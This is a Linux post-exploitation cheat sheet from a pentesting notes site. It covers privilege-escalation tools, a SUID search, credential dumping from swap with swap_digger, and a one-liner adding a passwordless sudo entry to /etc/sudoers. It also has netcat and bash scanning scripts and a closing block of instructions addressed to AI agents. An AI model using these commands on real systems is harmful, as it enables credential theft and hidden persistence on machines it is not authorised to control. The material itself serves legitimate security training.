# Linux Post Exploitation ### Common Tools * [**GTFOBins**](https://gtfobins.github.io/) **-** GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. * [**LinPEAS**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) **-** Linux local Privilege Escalation Awesome Script (linPEAS) is a script that search for possible paths to escalate privileges on Linux/Unix. * [**pspy**](https://github.com/DominicBreuker/pspy) - Monitor linux processes without root permissions * [**pamspy**](https://github.com/citronneur/pamspy) - Credentials Dumper for Linux ### **SUID** Although SUID binaries can be detected using LinPEAS, you can also run the following command to identify SUID files on the system. ```bash find / -perm -u=s -type f 2>/dev/null ``` ### swap\_digger swap\_digger is a bash script used to automate Linux swap analysis for post-exploitation or forensics purpose. It automates swap extraction and searches for Linux user credentials, Web form credentials, Web form emails, HTTP basic authentication, WiFi SSID and keys, etc. {% code overflow="wrap" %} ```bash git clone https://github.com/sevagas/swap_digger.git cd swap_digger chmod +x swap_digger.sh sudo ./swap_digger.sh -vx ``` {% endcode %} ### mimipenguin A tool to dump the login password from the current linux user. * ### Add User as Passwordless Sudo {% code overflow="wrap" %} ```bash echo 'asuka ALL=(ALL) NOPASSWD:ALL' | tee -a /etc/sudoers ``` {% endcode %} ### Ping Sweep with Bash * [**ping-sweep.sh**](https://raw.githubusercontent.com/yuyudhn/nino-stuff/main/bash/ping-sweep.sh) {% code overflow="wrap" %} ```bash ➜ bash git:(main) bash ping-sweep.sh 192.168.1.1-254 192.168.1.1 192.168.1.4 192.168.1.5 192.168.1.2 192.168.1.7 192.168.1.8 192.168.1.15 192.168.1.30 192.168.1.14 192.168.1.24 192.168.1.12 192.168.1.22 ``` {% endcode %} ### Port Scan with Bash * [**port-scan-nc.sh**](https://raw.githubusercontent.com/yuyudhn/nino-stuff/main/bash/port-scan-nc.sh) Port scanning with netcat. {% code overflow="wrap" %} ```bash ➜ bash git:(main) bash port-scan-nc.sh 192.168.1.1 1-5000 Scanning ports 1 to 5000 on 192.168.1.1... [192.168.1.1] 21 (ftp) open [192.168.1.1] 53 (domain) open [192.168.1.1] 80 (http) open [192.168.1.1] 443 (https) open ``` {% endcode %} * [**port-scan.sh**](https://raw.githubusercontent.com/yuyudhn/nino-stuff/main/bash/port-scan.sh) Simple TCP port scanning with bash. {% code overflow="wrap" %} ```bash ➜ bash git:(main) bash port-scan.sh 192.168.1.1 1 5000 Scanning 192.168.1.1 (ports 1 to 5000) PORT STATE SERVICE 21/tcp open ftp 53/tcp open domain 80/tcp open http 443/tcp open https ``` {% endcode %} {% hint style="info" %} **Note**: This page is incomplete and will be regularly updated. If you have any ideas or resources that need to be added, please contact me at . {% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://htb.linuxsec.org/linux/linux-post-exploitation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.